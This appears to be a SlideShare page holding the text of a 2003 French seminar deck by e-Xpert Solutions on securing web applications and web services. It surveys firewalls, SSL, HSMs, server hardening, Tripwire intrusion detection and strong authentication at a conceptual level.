Les firewalls applicatifs HTTP / WAFLes firewalls applicatifs HTTP / WAF
Les firewalls applicatifs HTTP / WAFSylvain Maret
 

Weitere ähnliche Inhalte

Was ist angesagt?

Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Sylvain Maret
 
Introduction à la sécurité informatique Volume2
Introduction à la sécurité informatique Volume2Introduction à la sécurité informatique Volume2
Introduction à la sécurité informatique Volume2Sylvain Maret
 
Presentation des failles_de_securite
Presentation des failles_de_securitePresentation des failles_de_securite
Presentation des failles_de_securiteBorni Dhifi
 
Conférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime MauchausséeConférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime MauchausséeNormandie Web Xperts
 
Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2Sylvain Maret
 
Les principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesLes principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesBee_Ware
 
Securité des applications web
Securité des applications webSecurité des applications web
Securité des applications webMarcel TCHOULEGHEU
 
Présentation Top10 CEGID Lyon
Présentation Top10 CEGID LyonPrésentation Top10 CEGID Lyon
Présentation Top10 CEGID LyonSébastien GIORIA
 
Vulnérabilité des sites web
Vulnérabilité des sites webVulnérabilité des sites web
Vulnérabilité des sites webSaid Sadik
 
Les menaces applicatives
Les menaces applicativesLes menaces applicatives
Les menaces applicativesBee_Ware
 
Sécurité des web services soap
Sécurité des web services soapSécurité des web services soap
Sécurité des web services soapZakaria SMAHI
 
Les 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASPLes 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASPyaboukir
 
White paper - La sécurisation des web services
White paper - La sécurisation des web servicesWhite paper - La sécurisation des web services
White paper - La sécurisation des web servicesBee_Ware
 
IDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAUIDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAUCHAOUACHI marwen
 
Introduction a la securité informatique Volume1
Introduction a la securité informatique Volume1Introduction a la securité informatique Volume1
Introduction a la securité informatique Volume1Sylvain Maret
 
Owasp top 10 2010 Resist toulouse
Owasp top 10 2010 Resist toulouseOwasp top 10 2010 Resist toulouse
Owasp top 10 2010 Resist toulouseSébastien GIORIA
 
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan Marcil
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan MarcilASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan Marcil
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan MarcilCyber Security Alliance
 
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...Faouzi Maddouri
 
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...Patrick Leclerc
 

Was ist angesagt? (20)

Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2
 
Introduction à la sécurité informatique Volume2
Introduction à la sécurité informatique Volume2Introduction à la sécurité informatique Volume2
Introduction à la sécurité informatique Volume2
 
Presentation des failles_de_securite
Presentation des failles_de_securitePresentation des failles_de_securite
Presentation des failles_de_securite
 
Conférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime MauchausséeConférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
 
Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2Introduction à La Sécurité Informatique 2/2
Introduction à La Sécurité Informatique 2/2
 
Les principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesLes principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuelles
 
Securité des applications web
Securité des applications webSecurité des applications web
Securité des applications web
 
Présentation Top10 CEGID Lyon
Présentation Top10 CEGID LyonPrésentation Top10 CEGID Lyon
Présentation Top10 CEGID Lyon
 
Vulnérabilité des sites web
Vulnérabilité des sites webVulnérabilité des sites web
Vulnérabilité des sites web
 
Les menaces applicatives
Les menaces applicativesLes menaces applicatives
Les menaces applicatives
 
Sécurité des web services soap
Sécurité des web services soapSécurité des web services soap
Sécurité des web services soap
 
Les 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASPLes 5 risques les plus critiques des applications Web selon l'OWASP
Les 5 risques les plus critiques des applications Web selon l'OWASP
 
Sécurité des applications web
Sécurité des applications webSécurité des applications web
Sécurité des applications web
 
White paper - La sécurisation des web services
White paper - La sécurisation des web servicesWhite paper - La sécurisation des web services
White paper - La sécurisation des web services
 
IDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAUIDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAU
 
Introduction a la securité informatique Volume1
Introduction a la securité informatique Volume1Introduction a la securité informatique Volume1
Introduction a la securité informatique Volume1
 
Owasp top 10 2010 Resist toulouse
Owasp top 10 2010 Resist toulouseOwasp top 10 2010 Resist toulouse
Owasp top 10 2010 Resist toulouse
 
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan Marcil
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan MarcilASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan Marcil
ASFWS 2012 - Les utilités d’un pare-feu applicatif Web (WAF) par Jonathan Marcil
 
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...
Politique de sécurité pour les entreprises : de l'analyse de risque vers la s...
 
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...
OWASP Québec - Attaques et techniques de défense des sessions Web - par Louis...
 

Ähnlich wie Sécurité des applications Web

Sophia conf securite microservices - 2017
Sophia conf securite microservices - 2017Sophia conf securite microservices - 2017
Sophia conf securite microservices - 2017SecludIT
 
Les firewalls applicatifs HTTP / WAF
Les firewalls applicatifs HTTP / WAFLes firewalls applicatifs HTTP / WAF
Les firewalls applicatifs HTTP / WAFSylvain Maret
 
Le Middleware, element cle pour lintegration de services M2M
Le Middleware, element cle pour lintegration de services M2MLe Middleware, element cle pour lintegration de services M2M
Le Middleware, element cle pour lintegration de services M2Msimon_anyware
 
Quelle technologie pour les accès distants sécurisés ?
Quelle technologie pour les accès distants sécurisés ?Quelle technologie pour les accès distants sécurisés ?
Quelle technologie pour les accès distants sécurisés ?Sylvain Maret
 
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012Sylvain Maret
 
Cloud Computing : enjeux pour les DSI
Cloud Computing : enjeux pour les DSICloud Computing : enjeux pour les DSI
Cloud Computing : enjeux pour les DSIStor Solutions
 
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...Microsoft Décideurs IT
 
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...Microsoft Technet France
 
Seminaire Portail Open Source
Seminaire Portail Open SourceSeminaire Portail Open Source
Seminaire Portail Open SourceIppon
 
Présentation OCSInventory SolutionsLinux 2009
Présentation OCSInventory SolutionsLinux 2009Présentation OCSInventory SolutionsLinux 2009
Présentation OCSInventory SolutionsLinux 2009Gonéri Le Bouder
 
Saas, WebApps, WebTop, ... Mythes et réalités sur les "Web Applications" pour...
Saas, WebApps, WebTop, ... Mythes et réalités sur les "Web Applications" pour...Saas, WebApps, WebTop, ... Mythes et réalités sur les "Web Applications" pour...
Saas, WebApps, WebTop, ... Mythes et réalités sur les "Web Applications" pour...Agence du Numérique (AdN)
 
Cours Authentication Manager RSA
Cours Authentication Manager RSACours Authentication Manager RSA
Cours Authentication Manager RSASylvain Maret
 
Témoignage client ProxiAD
Témoignage client ProxiADTémoignage client ProxiAD
Témoignage client ProxiADEclipseDayParis
 
Première rencontre d'owasp québec
Première rencontre d'owasp québecPremière rencontre d'owasp québec
Première rencontre d'owasp québecPatrick Leclerc
 

Ähnlich wie Sécurité des applications Web (20)

Sophia conf securite microservices - 2017
Sophia conf securite microservices - 2017Sophia conf securite microservices - 2017
Sophia conf securite microservices - 2017
 
Les firewalls applicatifs HTTP / WAF
Les firewalls applicatifs HTTP / WAFLes firewalls applicatifs HTTP / WAF
Les firewalls applicatifs HTTP / WAF
 
Curriculum vitae
Curriculum vitaeCurriculum vitae
Curriculum vitae
 
Le Middleware, element cle pour lintegration de services M2M
Le Middleware, element cle pour lintegration de services M2MLe Middleware, element cle pour lintegration de services M2M
Le Middleware, element cle pour lintegration de services M2M
 
Quelle technologie pour les accès distants sécurisés ?
Quelle technologie pour les accès distants sécurisés ?Quelle technologie pour les accès distants sécurisés ?
Quelle technologie pour les accès distants sécurisés ?
 
VPN: SSL vs IPSEC
VPN: SSL vs IPSECVPN: SSL vs IPSEC
VPN: SSL vs IPSEC
 
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
Securite des Web Services (SOAP vs REST) / OWASP Geneva dec. 2012
 
Cloud Computing : enjeux pour les DSI
Cloud Computing : enjeux pour les DSICloud Computing : enjeux pour les DSI
Cloud Computing : enjeux pour les DSI
 
SRI.pdf
SRI.pdfSRI.pdf
SRI.pdf
 
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
 
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
Azure IaaS : concevoir en architecture sécurisée en tirant bénéfice des nouve...
 
Seminaire Portail Open Source
Seminaire Portail Open SourceSeminaire Portail Open Source
Seminaire Portail Open Source
 
Cri iut 2005-wifi_free_radius
Cri iut 2005-wifi_free_radiusCri iut 2005-wifi_free_radius
Cri iut 2005-wifi_free_radius
 
Provectio Offre Indirecte
Provectio Offre IndirecteProvectio Offre Indirecte
Provectio Offre Indirecte
 
Présentation OCSInventory SolutionsLinux 2009
Présentation OCSInventory SolutionsLinux 2009Présentation OCSInventory SolutionsLinux 2009
Présentation OCSInventory SolutionsLinux 2009
 
Saas, WebApps, WebTop, ... Mythes et réalités sur les "Web Applications" pour...
Saas, WebApps, WebTop, ... Mythes et réalités sur les "Web Applications" pour...Saas, WebApps, WebTop, ... Mythes et réalités sur les "Web Applications" pour...
Saas, WebApps, WebTop, ... Mythes et réalités sur les "Web Applications" pour...
 
Cours Authentication Manager RSA
Cours Authentication Manager RSACours Authentication Manager RSA
Cours Authentication Manager RSA
 
Témoignage client ProxiAD
Témoignage client ProxiADTémoignage client ProxiAD
Témoignage client ProxiAD
 
Première rencontre d'owasp québec
Première rencontre d'owasp québecPremière rencontre d'owasp québec
Première rencontre d'owasp québec
 
Démystifions l'API-culture!
Démystifions l'API-culture!Démystifions l'API-culture!
Démystifions l'API-culture!
 

Mehr von Sylvain Maret

Air Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionAir Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionSylvain Maret
 
factsheet_4g_critical_comm_en_vl
factsheet_4g_critical_comm_en_vlfactsheet_4g_critical_comm_en_vl
factsheet_4g_critical_comm_en_vlSylvain Maret
 
INA Volume 1/3 Version 1.02 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.02 Released / Digital Identity and AuthenticationINA Volume 1/3 Version 1.02 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.02 Released / Digital Identity and AuthenticationSylvain Maret
 
INA Volume 1/3 Version 1.0 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 Released / Digital Identity and AuthenticationINA Volume 1/3 Version 1.0 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 Released / Digital Identity and AuthenticationSylvain Maret
 
INA Volume 1/3 Version 1.0 RC / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 RC / Digital Identity and AuthenticationINA Volume 1/3 Version 1.0 RC / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 RC / Digital Identity and AuthenticationSylvain Maret
 
Strong Authentication State of the Art 2012 / Sarajevo CSO
Strong Authentication State of the Art 2012 / Sarajevo CSOStrong Authentication State of the Art 2012 / Sarajevo CSO
Strong Authentication State of the Art 2012 / Sarajevo CSOSylvain Maret
 
ASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain Maret
ASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain MaretASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain Maret
ASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain MaretSylvain Maret
 
Threat Modeling / iPad
Threat Modeling / iPadThreat Modeling / iPad
Threat Modeling / iPadSylvain Maret
 
Strong Authentication in Web Application #SCS III
Strong Authentication in Web Application #SCS IIIStrong Authentication in Web Application #SCS III
Strong Authentication in Web Application #SCS IIISylvain Maret
 
Strong Authentication in Web Applications: State of the Art 2011
Strong Authentication in Web Applications: State of the Art 2011Strong Authentication in Web Applications: State of the Art 2011
Strong Authentication in Web Applications: State of the Art 2011Sylvain Maret
 
Strong Authentication in Web Application / ConFoo.ca 2011
Strong Authentication in Web Application / ConFoo.ca 2011Strong Authentication in Web Application / ConFoo.ca 2011
Strong Authentication in Web Application / ConFoo.ca 2011Sylvain Maret
 
Authentication and strong authentication for Web Application
Authentication and strong authentication for Web ApplicationAuthentication and strong authentication for Web Application
Authentication and strong authentication for Web ApplicationSylvain Maret
 
Geneva Application Security Forum 2010
Geneva Application Security Forum 2010Geneva Application Security Forum 2010
Geneva Application Security Forum 2010Sylvain Maret
 
Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...
Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...
Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...Sylvain Maret
 
Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...
Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...
Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...Sylvain Maret
 
Digital identity trust & confidence
Digital identity trust & confidenceDigital identity trust & confidence
Digital identity trust & confidenceSylvain Maret
 
Implementation of a Biometric Solution Providing Strong Authentication To Gai...
Implementation of a Biometric Solution Providing Strong Authentication To Gai...Implementation of a Biometric Solution Providing Strong Authentication To Gai...
Implementation of a Biometric Solution Providing Strong Authentication To Gai...Sylvain Maret
 
Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Sylvain Maret
 
Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Sylvain Maret
 
Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Sylvain Maret
 

Mehr von Sylvain Maret (20)

Air Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP RadionAir Navigation Service Providers - Unsecurity on Voice over IP Radion
Air Navigation Service Providers - Unsecurity on Voice over IP Radion
 
factsheet_4g_critical_comm_en_vl
factsheet_4g_critical_comm_en_vlfactsheet_4g_critical_comm_en_vl
factsheet_4g_critical_comm_en_vl
 
INA Volume 1/3 Version 1.02 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.02 Released / Digital Identity and AuthenticationINA Volume 1/3 Version 1.02 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.02 Released / Digital Identity and Authentication
 
INA Volume 1/3 Version 1.0 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 Released / Digital Identity and AuthenticationINA Volume 1/3 Version 1.0 Released / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 Released / Digital Identity and Authentication
 
INA Volume 1/3 Version 1.0 RC / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 RC / Digital Identity and AuthenticationINA Volume 1/3 Version 1.0 RC / Digital Identity and Authentication
INA Volume 1/3 Version 1.0 RC / Digital Identity and Authentication
 
Strong Authentication State of the Art 2012 / Sarajevo CSO
Strong Authentication State of the Art 2012 / Sarajevo CSOStrong Authentication State of the Art 2012 / Sarajevo CSO
Strong Authentication State of the Art 2012 / Sarajevo CSO
 
ASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain Maret
ASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain MaretASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain Maret
ASFWS 2012 / Initiation à la sécurité des Web Services par Sylvain Maret
 
Threat Modeling / iPad
Threat Modeling / iPadThreat Modeling / iPad
Threat Modeling / iPad
 
Strong Authentication in Web Application #SCS III
Strong Authentication in Web Application #SCS IIIStrong Authentication in Web Application #SCS III
Strong Authentication in Web Application #SCS III
 
Strong Authentication in Web Applications: State of the Art 2011
Strong Authentication in Web Applications: State of the Art 2011Strong Authentication in Web Applications: State of the Art 2011
Strong Authentication in Web Applications: State of the Art 2011
 
Strong Authentication in Web Application / ConFoo.ca 2011
Strong Authentication in Web Application / ConFoo.ca 2011Strong Authentication in Web Application / ConFoo.ca 2011
Strong Authentication in Web Application / ConFoo.ca 2011
 
Authentication and strong authentication for Web Application
Authentication and strong authentication for Web ApplicationAuthentication and strong authentication for Web Application
Authentication and strong authentication for Web Application
 
Geneva Application Security Forum 2010
Geneva Application Security Forum 2010Geneva Application Security Forum 2010
Geneva Application Security Forum 2010
 
Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...
Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...
Final conclusions of Working Group 3 at Workshop Münchenwiler 20-21 of May 20...
 
Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...
Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...
Comment protéger de façon efficace son/ses identité(s) numérique(s) sur le We...
 
Digital identity trust & confidence
Digital identity trust & confidenceDigital identity trust & confidence
Digital identity trust & confidence
 
Implementation of a Biometric Solution Providing Strong Authentication To Gai...
Implementation of a Biometric Solution Providing Strong Authentication To Gai...Implementation of a Biometric Solution Providing Strong Authentication To Gai...
Implementation of a Biometric Solution Providing Strong Authentication To Gai...
 
Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...
 
Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...
 
Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...Geneva Application Security Forum: Vers une authentification plus forte dans ...
Geneva Application Security Forum: Vers une authentification plus forte dans ...
 

Sécurité des applications Web

  • 1. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 La sécurité des services Web votre firewall, votre meilleur ennemi Mardi 11 mars 2003 Avec la participation de RSA Security Sylvain Maret / CTO e-Xpert Solutions  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 2. e-Xpert Solutions: motivations stratégiques…  e-Xpert Solutions SA, c’est deux ans d’activité mais aussi…  Des convictions techniques  La sécurité informatique nécessite des experts dédiés  Complémentarité de la sécurité classique et des dernières technologies  Primauté de la veille technologique (vague avant-gardiste)  Une compréhension des évolutions de la sécurité informatique (l’expérience…)  Une philosophie de prestation de qualité  Discrétion et traitement confidentiel des données de notre clientèle  Rigueur et sérieux  Importance du suivi opérationnel  Une adéquation entre des solutions, des besoins et des moyens à disposition  Dans la pratique…  Des implémentations rigoureuses (études avant-projets, planification, mesure de recettes)  Des services de maintenances réactives & préventives  Des formations sur mesure (sensibilisation, suivi opérationnel, etc.)  Des Cursus réguliers (UniGe, HES Genève & Yverdon)  Solutions à la clef
  • 3. Les solutions e-Xpert Solutions  Solutions de sécurité ―classiques‖  L’accès: Firewalls, Proxy, Reverse Proxy SSL, authentification forte  Les communications: VPN, Proxy , IDS, contenu Web, messagerie sécurisée, analyse des URLs  Les systèmes: sécurité des OS, IDS-FIA, Antivirus  Solutions de sécurité de ―pointes‖  L’accès: Firewalls applicatifs, gestion des identités, PKI (OSCP), Biométrie  Les communications: PKI, Signature électronique, S/MIME  Les systèmes: PKI, HSM, Chiffrement (Key Recovery), IPS  L’architecture et les applications  Design réseau  Haute disponibilité  Autorisation et privilèges d’accès  Et ce qui suit…  Solutions à la clef
  • 4. Le but du séminaire…  Nécessité mais insuffisance des outils de sécurité classiques  Cf. SQL Slammer, Nimda (IIS), Slapper (SSL), Opaserv (WINS), Bugbear (SMTP/Netbios)  Où sont les menaces et les ―challenges‖ à l’heure actuelle  Protéger les applications – en particulier les services Web  Solutions à la clef
  • 5. Agenda  9h40 La sécurité des services Web I  Sylvain Maret – e-Xpert Solutions SA  10h00 RSA Security Mobile et Clear Trust  Hervé Ottet – RSA Security  10h20 Pause de 20 minutes  10h40 La sécurité des services Web II  Sylvain Maret – e-Xpert Solutions SA  11h00 Présentation et démonstration Entercept  Christian Berclaz – e-Xpert Solutions SA  11h20 Questions & réponses  11h30 Showroom et buffet  Solutions à la clef
  • 6. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 La sécurité des services Web votre firewall, votre meilleur ennemi La sécurité « Classique » (Partie I) par Sylvain Maret 11 mars 2003  info@e-xpertsolutions.com | www.e-xpertsolutions.com
  • 7. Définition: application Web  Application utilisant le protocole HTTP (80) ou HTTPS (443) pour être pilotée par un utilisateur  L’utilisateur a besoin d’un simple navigateur Web ou d’une application propriétaire utilisant le protocole HTTP/HTTPS pour travailler sur l’applicatif  Exemple: OWA, eBanking, Hotmail, votre portail, etc.  Solutions à la clef
  • 8. Définition: services Web  Composant offrant un ou plusieurs services métiers publiés sur un réseau (Internet)  Traduction du moteur Google  Réservation d’un Hôtel  Base de données, etc.  Utilise des technologies telles que:  Soap, XML, WSDL, UDDI, etc.  Technologie émergente  Même problème de sécurité  Solutions à la clef
  • 9. Architecture d’une application Web Serveur Web App. Web DB Application Server XML HTTP / HTTPS Apache RMI Port 80 / 443 IIS SQL IIOP Iplanet XML XML Zeus JDBC XML, Soap, HTML, Soap Etc. etc. etc. etc. CGI, PHP Etc. App. Web DB Client Web Firewall Classique  Solutions à la clef
  • 10. Risques acceptables ?  La sécurité « classique »  La sécurisation du périmètre et des systèmes  La sécurité de « pointe »  La sécurisation des applications Web  La gestion des identités  Firewall applicatifs Web  Analyse comportementale  Solutions à la clef
  • 11. Les éléments de la sécurité « classique »  Segmentation - Firewall  Sécurisation des communications SSL  Blindage des systèmes d’exploitations  Détection d’intrusions  Blindage des serveurs Web  Reverse Proxy – Haute Disponibilité  Authentification forte  SecurID et RSA Mobile  Certificats Numériques  Solutions à la clef
  • 12. Segmentation - Firewall Liaison Physique ICMP IP Autres UDP protocoles DNS Etc. TCP http https Autres protocoles smtp Etc.  Solutions à la clef
  • 13. Segmentation - Firewall X TCP pop3 http https ftp X Serveur Web  Solutions à la clef
  • 14. Segmentation - Firewall DMZ Réseau Interne SMTP SMTP X X Mail Server Mail Server (Lotus, Exchange) SQL HTTP SOAP Back Office Application Web SAP, Oracle, etc.  Solutions à la clef
  • 15. Sécurisation des communications: SSL  Sécurisation du transport entre le client et le serveur  Technologie VPN embarquée dans les clients Web  Services de sécurité  Confidentialité (par exemple un chiffrement à 128 bits)  Intégrité des données  Authentification du serveur  Option: authentification du client  Utilisation de la technologie PKI  Certificat numérique pour le serveur  Solutions à la clef
  • 16. SSL: authentification du serveur Root CA publique Certificat du site http://largo.e-xpertsolutions.com SSL 128 bit Vérification Du certificat  Solutions à la clef
  • 17. Sécurisation de vos transactions SSL: un module HSM HSM Ncipher  Protège les clés privées d’une FIPS-140 intrusion  Sécurise les transactions SSL  Calcul cryptographique dans le module  Support PKCS#11  Apache, IIS, IPlanet, etc e-Xpert Gate SSL  Solutions à la clef
  • 18. Augmentation de la puissance SSL jusqu’a 800 transactions par seconde  Solutions à la clef
  • 19. Haute disponibilité, partage de charge http / https Application Web http F5 Big IP Application Web HTTP / HTTPS http Répartition de charge http Gestion des sessions Application Web Haute disponibilité Facilité à la maintenance des systèmes Terminaison SSL Possible  Solutions à la clef
  • 20. Blindage des systèmes d’exploitation: risque minimum  Restriction des services  Sécurisation du « stack » IP  Déni de services, opacité de « l’emprunte »  Mise en place des règles du firewall local  Gestion des droits sur les fichiers  Gestion sécurisée  SSH, Remote Control sécurisé  Authentification forte pour la gestion  Détection des tentatives d’intrusions  Mécanismes d’alertes (Snmp. Syslog, etc.)  Politique d’application des « Patchs » de sécurité  Solutions à la clef
  • 21. Système de détection d’intrusions: Host IDS (FIA)  Permet de déceler une tentative d’intrusion sur une application Web et son système d’exploitation  Il s’agit d’une technologie de détection d’intrusions  File Integrity Assesment  Basé sur l’utilisation de la cryptographie moderne  Méthode de « Hashing » (Sha1, md4, etc.)  Méthode de signature numérique (RSA, El Gamal)  Au 1er changement, l’éventuelle intrusion est signalée  Solutions à la clef
  • 22. Détection d’intrusion avec Tripwire Alerte intrusion « Defacement B » Console de gestion TRIPWIRE T W B T W A  Solutions à la clef
  • 23. Sécurisation des serveurs Web: la sécurité accrue  Sécurisation du serveur IIS Microsoft  Suppression des composants inutiles (ISA-API)  Suppression de la bannière  Application des patchs  Application d’une politique de sécurité e-Xpert Solutions  Outils Microsoft (IIS Lock)  Sécurisation du serveur Apache  Suppression des modules inutiles  Suppression de la bannière  Application des patchs  Configuration en mode « Jail » pour un blindage optimale  Solutions à la clef
  • 24. L’importance de l’opacité du serveur  Prévenir l’intrusion  Demande plus de temps d’analyse avant une tentative d’attaque  Difficulté de trouver des exploits pour un serveur Web spécifique  Pour leurrer les robots  Script Kiddies  Pour éviter certains Vers Mauvais exemple ! (* Slammer 2002 )  Solutions à la clef
  • 25. Clé de voûte de la sécurité: l’authentification forte QQ que l’on possède QQ que l’on connaît + + QQ que l’on est H34ff34QF PIN Code  Solutions à la clef
  • 26. Pourquoi l’authentification forte ?  Vol de mot de passe sur le réseau  Majorité des protocoles n’est pas chiffrée  Renifleurs spécialisés pour les script kiddies (Gestion des attaques de type ARP)  MiM attack SSL  Ecoute des touches du clavier  Key Logger, Troyan, Back Door, Code mobile, etc,  Attaques par « brute force » ou dictionnaire  Valable pour les applications sans mécanisme de protection  Social Engineering  Solutions à la clef
  • 27. e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50 Démonstration par la pratique SSL Hijacking  info@e-xpertsolutions.com | www.e-xpertsolutions.com
